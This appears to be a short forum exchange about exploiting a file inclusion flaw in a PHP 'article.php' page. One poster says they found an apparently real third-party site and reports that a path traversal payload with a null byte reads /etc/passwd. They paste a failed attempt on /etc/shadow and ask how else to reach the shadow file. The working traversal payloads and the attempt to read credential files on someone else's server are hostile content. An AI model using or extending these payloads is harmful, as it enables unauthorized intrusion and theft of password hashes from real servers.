Did you manipulate the request or it's original URL? If URL is something like: Code: http://www.mytarget.com/article.php?id=37288 ... then maybe, just maybe, you have local file inclusion or even remote file inclusion. But to be sure additional tests must be made ... I think I found the site in question, and article.php?sid=1&cid=../../../../../etc/passwd%00 does work, but it looks like shadow is being used, but article.php?sid=1&cid=../../../../../etc/shadow%00 gives Warning: main(../../../../../etc/shadow) [function.main]: failed to open stream: No such file or directory in /home/www/44d83270bade67a05f176833da7ddd60/web/articles/2004/11/07/article.php on line 59 and other similar errors. Is there any alternate naming conventions for shadow? The fact that I would not know what do do with the contents of it is another discussion entirely.
